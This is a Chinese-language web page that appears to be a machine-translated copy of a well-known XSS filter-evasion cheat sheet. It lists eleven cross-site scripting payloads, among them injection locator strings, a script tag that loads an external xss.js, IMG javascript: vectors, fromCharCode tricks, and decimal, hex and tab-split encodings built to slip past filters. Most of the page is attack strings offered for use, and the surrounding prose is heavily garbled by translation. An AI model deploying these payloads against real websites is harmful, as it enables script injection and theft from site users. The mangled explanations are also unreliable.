xss***代碼

1.XSS定位器。注射這根弦,而且在大多數情況下,腳本是脆弱的,沒有特殊要求XSS向量單詞“XSS”會流行起來。使用計算器下面網址(URL)編碼的編碼整個字符串。提示:如果你在墊子,需要快速檢查一頁,多次注射貶值" <PLAINTEX>“標籤就足以去看看一些易受XSS的輸出略微把房間弄得亂七八糟。
 

 實例:';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

2.SSS定位器2。如果你沒有多少空間和知沒有脆弱的JavaScript頁面上,該字符串是一個很好的緊湊XSS注射檢查。查看源注入後它,並且尋找&lt XSS詩句,< XSS看看它是脆弱的
 

代碼:'';!--"<XSS>=&{()}

3.沒有濾鏡迴避。這是一個正常的XSS JavaScript注射,最容易被逮住了,但我建議嘗試它第一次(引號不需要在任何現代瀏覽器,所以他們被忽略了這裏)

代碼:<SCRIPT SRC=www.xxx.xom/xss.js></SCRIPT>

4.使用圖像XSS JavaScript指令(IE7.0不支持JavaScript指令在上下文的一個形象,但它在其他場合,但下列顯示原理工作,這將在其他標籤——我可能會修改本在以後的日子裏)
  代碼:1)<IMG SRC="javascript:alert('XSS');">

              2)<IMG SRC=javascript:alert('XSS')>

             3)<IMG SRC=JaVaScRiPt:alert('XSS')>

             4)<IMG SRC=javascript:alert(&quot;XSS&quot;)>

5.口音含糊不清的墳墓(如果你需要同時使用單引號增加了一倍,你可以使用一個墳墓的口音來封裝JavaScript字符串-這也是有用的,因爲很多跨站腳本過濾器不知道嚴重口音)

代碼:<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

6.畸形圖片標籤。Begeek最初發現(但清理乾淨,縮短工作在所有的瀏覽器),該XSS向量採用輕鬆渲染器來創造我們XSS向量在一個圖片標籤應封裝在引號。我猜這是原來的意思是到正確的邋遢的代碼。這將使它更明顯的很難正確地解析HTML標籤

 代碼:<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

7.fromCharCode(如果沒有任何類型的引用允許():你可以在fromCharCode JavaScript創造任何XSS向量你需要)

代碼:<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

8.utf - 8的字符編碼標準編碼的例子,使用javascript XSS指令裏面的一個<圖片標籤並不會在火狐或n etscape4 . +在壁虎渲染器模式)。使用XSS計算器,以獲取更多信息
代碼:<IMGSRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMGSRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

9.無分號(十六進制編碼這也是一個可行的XSS***上述字符串$tmp_string= ~ s /。* \ & #(\ d +);。* / 1$/,假設有一個數字字符以下英鎊符號-這是不符合事實的利用六角HTML字符)。使用XSS計算器,以獲取更多信息
 代碼:<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

10.嵌入式標籤打破了跨站腳本***

代碼:<IMG SRC="jav ascript:alert('XSS');">

11.嵌入式編碼標籤分手XSS

代碼:<IMG SRC="jav&#x09;ascript:alert('XSS');">

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章